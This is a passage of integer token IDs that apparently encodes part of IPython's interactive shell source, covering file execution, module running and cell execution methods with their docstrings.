220, 220, 220, 220, 810, 1058, 46545, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1881, 393, 734, 3891, 43076, 11, 3804, 284, 2452, 7753, 3419, 355, 357, 4743, 672, 874, 11, 17946, 874, 737, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 691, 530, 318, 1813, 11, 340, 318, 3804, 355, 1111, 13, 198, 220, 220, 220, 220, 220, 220, 220, 8420, 62, 46430, 1058, 20512, 357, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 788, 9550, 4482, 30337, 329, 1729, 12, 22570, 3722, 357, 270, 318, 1464, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 38086, 329, 6632, 3722, 11, 355, 340, 318, 523, 2219, 737, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 62, 1069, 11755, 1058, 20512, 357, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 5298, 13269, 8347, 13, 2185, 415, 329, 4856, 13, 198, 220, 220, 220, 220, 220, 220, 220, 7582, 62, 69, 315, 942, 1058, 20512, 357, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 262, 2438, 481, 2648, 2003, 6299, 351, 262, 14333, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7582, 13, 632, 481, 1111, 307, 5676, 416, 2180, 11593, 37443, 834, 17944, 11, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 597, 11593, 37443, 834, 17944, 287, 262, 2438, 481, 2689, 262, 7582, 13, 1002, 10352, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11593, 37443, 834, 17944, 389, 407, 4888, 287, 2035, 4571, 13, 628, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 277, 3672, 796, 28686, 13, 6978, 13, 397, 2777, 776, 7, 418, 13, 6978, 13, 11201, 392, 7220, 7, 69, 3672, 4008, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 6889, 1654, 356, 460, 1280, 262, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 1280, 7, 69, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9828, 10786, 23722, 407, 1280, 2393, 1279, 4, 82, 29, 329, 3338, 9706, 2637, 4064, 277, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9938, 1243, 635, 287, 1459, 8619, 13, 220, 770, 318, 2622, 284, 26332, 262, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 4069, 286, 2491, 257, 4226, 422, 262, 1080, 3141, 1627, 11, 810, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 11361, 42220, 262, 4226, 338, 8619, 656, 25064, 13, 6978, 198, 220, 220, 220, 220, 220, 220, 220, 288, 3672, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 69, 3672, 8, 628, 220, 220, 220, 220, 220, 220, 220, 351, 3143, 1631, 62, 1462, 62, 17597, 6978, 7, 67, 3672, 828, 2116, 13, 18780, 259, 62, 46670, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 15095, 11, 1179, 796, 357, 3003, 1343, 357, 14202, 11, 15306, 58, 25, 17, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12972, 18, 5589, 265, 13, 18558, 7753, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 3672, 11, 15095, 11, 1179, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 5589, 576, 611, 7582, 62, 69, 315, 942, 2073, 6045, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 4482, 30337, 355, 3722, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1002, 262, 869, 373, 925, 351, 657, 393, 6045, 8420, 3722, 357, 17597, 13, 37023, 7, 15, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 393, 25064, 13, 37023, 3419, 10612, 836, 470, 11393, 4478, 257, 12854, 1891, 11, 355, 1111, 286, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 777, 389, 3177, 3487, 416, 262, 7294, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1875, 21015, 532, 66, 6, 11748, 25064, 26, 17597, 13, 37023, 7, 15, 8, 17020, 9809, 720, 30, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 657, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1875, 21015, 532, 66, 6, 11748, 25064, 26, 17597, 13, 37023, 3419, 17020, 9809, 720, 30, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 657, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 1114, 584, 8420, 3722, 11, 356, 905, 262, 6631, 4556, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 11777, 38086, 11, 475, 691, 287, 1790, 1296, 13, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 3722, 13, 8189, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 5298, 62, 1069, 11755, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 407, 8420, 62, 46430, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 7, 1069, 4516, 62, 8807, 28, 17821, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 5298, 62, 1069, 11755, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 256, 65, 11677, 318, 362, 780, 356, 14441, 2452, 7753, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 7, 83, 65, 62, 28968, 28, 17, 8, 628, 220, 220, 220, 825, 3338, 62, 18558, 7753, 62, 541, 88, 7, 944, 11, 277, 3672, 11, 7582, 62, 69, 315, 942, 28, 25101, 11, 5298, 62, 1069, 11755, 28, 25101, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 7594, 3338, 62, 18558, 7753, 11, 475, 329, 764, 541, 88, 393, 764, 541, 2047, 65, 3696, 351, 6101, 7535, 15582, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 277, 3672, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 2393, 284, 12260, 13, 220, 383, 29472, 1276, 423, 257, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 764, 541, 88, 393, 764, 541, 2047, 65, 7552, 13, 198, 220, 220, 220, 220, 220, 220, 220, 7582, 62, 69, 315, 942, 1058, 20512, 357, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 262, 2438, 481, 2648, 2003, 6299, 351, 262, 14333, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7582, 13, 632, 481, 1111, 307, 5676, 416, 2180, 11593, 37443, 834, 17944, 11, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 597, 11593, 37443, 834, 17944, 287, 262, 2438, 481, 2689, 262, 7582, 13, 1002, 10352, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11593, 37443, 834, 17944, 389, 407, 4888, 287, 2035, 4571, 13, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 62, 1069, 11755, 1058, 20512, 357, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 5298, 13269, 8347, 13, 220, 2185, 415, 329, 4856, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 277, 3672, 796, 28686, 13, 6978, 13, 397, 2777, 776, 7, 418, 13, 6978, 13, 11201, 392, 7220, 7, 69, 3672, 4008, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 6889, 1654, 356, 460, 1280, 262, 2393, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 1280, 7, 69, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1208, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9828, 10786, 23722, 407, 1280, 2393, 1279, 4, 82, 29, 329, 3338, 9706, 2637, 4064, 277, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 9938, 1243, 635, 287, 1459, 8619, 13, 220, 770, 318, 2622, 284, 26332, 262, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 4069, 286, 2491, 257, 4226, 422, 262, 1080, 3141, 1627, 11, 810, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 11361, 42220, 262, 4226, 338, 8619, 656, 25064, 13, 6978, 198, 220, 220, 220, 220, 220, 220, 220, 288, 3672, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 69, 3672, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 825, 651, 62, 46342, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 37227, 8612, 1352, 329, 8379, 286, 2438, 7021, 284, 1057, 37811, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 277, 3672, 13, 437, 2032, 342, 7, 4458, 541, 2047, 65, 6, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 422, 299, 65, 18982, 1330, 1100, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 299, 65, 796, 1100, 7, 69, 3672, 11, 355, 62, 9641, 28, 19, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 407, 299, 65, 13, 46342, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 2685, 287, 299, 65, 13, 46342, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2685, 13, 3846, 62, 4906, 6624, 705, 8189, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7800, 2685, 13, 10459, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 351, 1280, 7, 69, 3672, 8, 355, 277, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7800, 277, 13, 961, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 351, 3143, 1631, 62, 1462, 62, 17597, 6978, 7, 67, 3672, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 329, 2685, 287, 651, 62, 46342, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 2116, 13, 5143, 62, 3846, 7, 3846, 11, 10574, 28, 17821, 11, 7582, 62, 69, 315, 942, 28, 29149, 62, 69, 315, 942, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 5298, 62, 1069, 11755, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 13, 40225, 62, 18224, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 407, 1255, 13, 13138, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2270, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 5298, 62, 1069, 11755, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9828, 10786, 20035, 5287, 23710, 2393, 25, 1279, 4, 82, 29, 6, 4064, 277, 3672, 8, 628, 220, 220, 220, 825, 3338, 62, 5143, 62, 21412, 7, 944, 11, 953, 62, 3672, 11, 810, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 32, 3338, 2196, 286, 1057, 9078, 13, 5143, 62, 21412, 22446, 628, 220, 220, 220, 220, 220, 220, 220, 770, 2196, 481, 1239, 3714, 281, 6631, 11, 475, 2427, 3601, 198, 220, 220, 220, 220, 220, 220, 220, 7613, 4049, 6218, 284, 262, 3159, 13, 628, 220, 220, 220, 220, 220, 220, 220, 4600, 11964, 30337, 63, 13269, 351, 3722, 2438, 657, 393, 6045, 389, 9514, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 953, 62, 3672, 1058, 4731, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 1438, 286, 262, 8265, 284, 307, 10945, 13, 198, 220, 220, 220, 220, 220, 220, 220, 810, 1058, 8633, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 15095, 874, 25745, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 810, 13, 19119, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1057, 9078, 13, 5143, 62, 21412, 7, 2536, 7, 4666, 62, 3672, 828, 1057, 62, 3672, 2625, 834, 12417, 834, 1600, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8343, 62, 17597, 28, 17821, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1267, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2845, 4482, 30337, 355, 3722, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 3722, 13, 8189, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 5298, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 3419, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9828, 10786, 20035, 5287, 23710, 8265, 25, 1279, 4, 82, 29, 6, 4064, 953, 62, 3672, 8, 628, 220, 220, 220, 825, 1057, 62, 3846, 7, 944, 11, 8246, 62, 3846, 11, 3650, 62, 23569, 28, 25101, 11, 10574, 28, 25101, 11, 7582, 62, 69, 315, 942, 28, 17821, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 10987, 257, 1844, 6101, 7535, 2685, 13, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 1058, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 2438, 357, 8201, 6101, 7535, 2438, 884, 355, 4064, 32707, 5499, 8, 284, 1057, 13, 198, 220, 220, 220, 220, 220, 220, 220, 3650, 62, 23569, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 262, 8246, 290, 14251, 2685, 481, 307, 8574, 287, 6101, 7535, 338, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2106, 13, 1114, 2836, 2438, 4585, 736, 656, 6101, 7535, 338, 20230, 11, 428, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 815, 307, 900, 284, 10352, 13, 198, 220, 220, 220, 220, 220, 220, 220, 10574, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 3368, 1735, 12, 34435, 11, 884, 355, 16992, 3359, 25480, 82, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 290, 18931, 13, 220, 10574, 28, 17821, 3386, 3650, 62, 23569, 28, 25101, 13, 198, 220, 220, 220, 220, 220, 220, 220, 7582, 62, 69, 315, 942, 1058, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1002, 6407, 11, 262, 2438, 481, 2648, 2003, 6299, 351, 262, 14333, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7582, 13, 632, 481, 1111, 307, 5676, 416, 2180, 11593, 37443, 834, 17944, 11, 290, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 597, 11593, 37443, 834, 17944, 287, 262, 2438, 481, 2689, 262, 7582, 13, 1002, 10352, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 11593, 37443, 834, 17944, 389, 407, 4888, 287, 2035, 4571, 13, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 1255, 1058, 1058, 4871, 25, 63, 23002, 1009, 23004, 63, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 2116, 13557, 5143, 62, 3846, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 11, 3650, 62, 23569, 11, 10574, 11, 7582, 62, 69, 315, 942, 8, 198, 220, 220, 220, 220, 220, 220, 220, 3443, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 31534, 13, 46284, 10786, 7353, 62, 41049, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 407, 10574, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 31534, 13, 46284, 10786, 7353, 62, 5143, 62, 3846, 3256, 1255, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 628, 220, 220, 220, 825, 4808, 5143, 62, 3846, 7, 944, 11, 8246, 62, 3846, 25, 2536, 11, 3650, 62, 23569, 25, 30388, 11, 10574, 25, 30388, 11, 7582, 62, 69, 315, 942, 25, 30388, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 37693, 2446, 284, 1057, 257, 1844, 6101, 7535, 2685, 526, 15931, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 356, 761, 284, 3368, 4585, 2116, 13, 35636, 62, 3846, 3294, 640, 319, 262, 976, 1517, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 523, 356, 761, 284, 3650, 617, 2482, 25, 198, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 796, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14434, 62, 3846, 796, 2116, 13, 35636, 62, 3846, 7, 1831, 62, 3846, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 35528, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14434, 62, 3846, 796, 8246, 62, 3846, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 796, 25064, 13, 41194, 62, 10951, 3419, 628, 220, 220, 220, 220, 220, 220, 220, 6818, 14434, 62, 3846, 318, 407, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 1162, 78, 796, 2116, 13, 5143, 62, 3846, 62, 292, 13361, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3650, 62, 23569, 28, 8095, 62, 23569, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10574, 28, 18217, 298, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7582, 62, 69, 315, 942, 28, 29149, 62, 69, 315, 942, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14434, 62, 3846, 28, 7645, 12214, 62, 3846, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 28, 3866, 36948, 62, 41194, 62, 83, 29291, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1267, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 1057, 62, 3846, 62, 292, 13361, 318, 30351, 11, 475, 743, 407, 1682, 761, 281, 1785, 26268, 13, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 618, 428, 318, 262, 1339, 11, 356, 765, 284, 1057, 340, 1262, 262, 24543, 62, 27261, 62, 16737, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 523, 326, 2438, 460, 26342, 1785, 5439, 2840, 357, 1640, 1672, 2884, 262, 4064, 5143, 837, 290, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 4600, 4, 34274, 63, 5536, 13, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2116, 13, 83, 27250, 62, 16737, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17490, 796, 2116, 13, 83, 27250, 62, 16737, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2116, 13, 21754, 62, 5143, 62, 292, 13361, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14434, 62, 3846, 28, 7645, 12214, 62, 3846, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 662, 36948, 62, 41194, 62, 83, 29291, 28, 3866, 36948, 62, 41194, 62, 83, 29291, 11, 198, 220, 220, 220, 220, 220, 220, 220, 15179, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17490, 796, 2116, 13, 26268, 62, 16737, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17490, 796, 4808, 7752, 12003, 62, 27261, 62, 16737, 628, 220, 220, 220, 220, 220, 220, 220, 1949, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 17490, 7, 10215, 78, 8, 198, 220, 220, 220, 220, 220, 220, 220, 2845, 7308, 16922, 355, 304, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7508, 796, 37497, 12360, 7, 1831, 62, 3846, 11, 3650, 62, 23569, 11, 10574, 11, 7582, 62, 69, 315, 942, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 796, 37497, 23004, 7, 10951, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1255, 13, 18224, 62, 259, 62, 18558, 796, 304, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2116, 13, 12860, 40546, 1891, 7, 20270, 62, 5589, 3902, 62, 8189, 28, 17821, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 1255, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 628, 220, 220, 220, 825, 815, 62, 5143, 62, 292, 13361, 7, 198, 220, 220, 220, 220, 220, 220, 220, 2116, 11, 8246, 62, 3846, 25, 965, 11, 1635, 11, 14434, 62, 3846, 28, 14202, 11, 662, 36948, 62, 41194, 62, 83, 29291, 28, 14202, 198, 220, 220, 220, 1267, 4613, 20512, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 13615, 1771, 257, 2685, 815, 307, 1057, 355, 24871, 3481, 2884, 257, 1162, 28399, 17490, 628, 220, 220, 220, 220, 220, 220, 220, 40117, 198, 220, 220, 220, 220, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 220, 220, 220, 220, 8246, 62, 3846, 25, 965, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 383, 2438, 284, 307, 10945, 628, 220, 220, 220, 220, 220, 220, 220, 16409, 198, 220, 220, 220, 220, 220, 220, 220, 35656, 198, 220, 220, 220, 220, 220, 220, 220, 1255, 25, 20512, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10127, 262, 2438, 2476, 284, 307, 1057, 351, 257, 1162, 28399, 17490, 393, 407, 628, 220, 220, 220, 220, 220, 220, 220, 11485, 2196, 29373, 25, 767, 13, 15, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 611, 407, 2116, 13, 23736, 707, 4548, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 611, 662, 36948, 62, 41194, 62, 83, 29291, 318, 407, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1441, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 6818, 662, 36948, 62, 41194, 62, 83, 29291, 318, 6045, 198, 220, 220, 220, 220, 220, 220, 220, 611, 14434, 62, 3846, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 14601, 13, 40539, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 63, 21754, 62, 5143, 62, 292, 13361, 63, 481, 407, 869, 4600, 35636, 62, 3846, 63, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 6338, 287, 262, 2003, 13, 4222, 1208, 262, 1255, 284, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 4600, 7645, 12214, 62, 3846, 63, 4578, 290, 597, 6631, 326, 1645, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 1141, 262, 1, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 366, 35636, 287, 4600, 3866, 36948, 62, 41194, 62, 83, 